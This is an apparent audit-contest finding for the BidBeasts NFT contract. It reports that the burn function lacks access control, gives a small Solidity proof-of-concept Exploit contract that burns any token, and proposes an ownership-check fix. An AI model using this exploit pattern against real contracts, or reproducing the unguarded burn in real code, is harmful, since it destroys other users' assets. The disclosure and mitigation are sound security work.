Bid Beasts
First Flight #49
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Unauthorized Token Burning Vulnerability

objectplayer

Root + Impact

Description

  • The normal behavior of a burn function in an NFT contract should be to allow only the token owner or approved addresses to destroy their own tokens.

  • The specific issue in the BidBeasts contract is that the burn function has no access control, allowing any address to burn any token regardless of ownership.

function burn(uint256 _tokenId) public {
_burn(_tokenId);
emit BidBeastsBurn(msg.sender, _tokenId);
}

Risk

Likelihood: High

  • Any user who knows a token ID can call this function to burn that token.

  • No special permissions, conditions, or technical knowledge is required beyond basic contract interaction.

Impact: Critical

  • Permanent and irreversible loss of NFT assets for token holders.

  • Complete undermining of ownership rights in the NFT ecosystem.

  • Potential market manipulation by maliciously burning valuable or listed NFTs.

  • Loss of trust in the platform as users realize their assets can be destroyed by anyone.

Proof of Concept

// Assume Alice owns tokenId 5
// Bob is a malicious actor who doesn't own any tokens
// Attack scenario:
// 1. Bob calls BidBeasts.burn(5)
// 2. The function executes without any ownership checks
// 3. Alice's token is permanently burned
// 4. Alice has no recourse as burns are irreversible
contract Exploit {
BidBeasts target;
constructor(address _target) {
target = BidBeasts(_target);
}
function burnAnyToken(uint256 tokenId) external {
// Anyone can burn any token
target.burn(tokenId);
}
}

The vulnerability allows any address to burn any token without permission. This is particularly dangerous because:

  1. No Authorization Required: The function lacks any check to verify if the caller is the token owner or an approved address.

  2. Simple Attack Vector: A malicious actor only needs to know the token ID to destroy it permanently.

  3. Irreversible Damage: Once burned, NFTs cannot be recovered as the metadata and ownership record is permanently deleted from the blockchain.

  4. Market Implications: This could be exploited to manipulate markets - for example, burning rare tokens to increase the value of similar tokens, or burning tokens listed on the marketplace to disrupt auctions.

Recommended Mitigation

- function burn(uint256 _tokenId) public {
- _burn(_tokenId);
- emit BidBeastsBurn(msg.sender, _tokenId);
- }
+ function burn(uint256 _tokenId) public {
+ require(ownerOf(_tokenId) == msg.sender || isApprovedForAll(ownerOf(_tokenId), msg.sender) || getApproved(_tokenId) == msg.sender, "Not token owner or approved");
+ _burn(_tokenId);
+ emit BidBeastsBurn(msg.sender, _tokenId);
+ }

The mitigation adds proper access control to the burn function by:

  1. Ownership Verification:

    • Checks if the caller is the actual token owner (ownerOf(_tokenId) == msg.sender)

    • Checks if the caller is an approved operator for the owner (isApprovedForAll(ownerOf(_tokenId), msg.sender))

    • Checks if the caller is specifically approved for this token (getApproved(_tokenId) == msg.sender)

  2. Security Benefits:

    • Aligns with ERC721 standards for token operations

    • Prevents unauthorized destruction of NFT assets

    • Preserves ownership rights and the integrity of the NFT ecosystem

    • Maintains compatibility with the marketplace contract

This fix ensures that only legitimate token owners or their approved delegates can burn tokens, protecting users' digital assets from malicious actors.

Updates

Lead Judging Commences

cryptoghost Lead Judge 21 days ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

cryptoghost Lead Judge 21 days ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.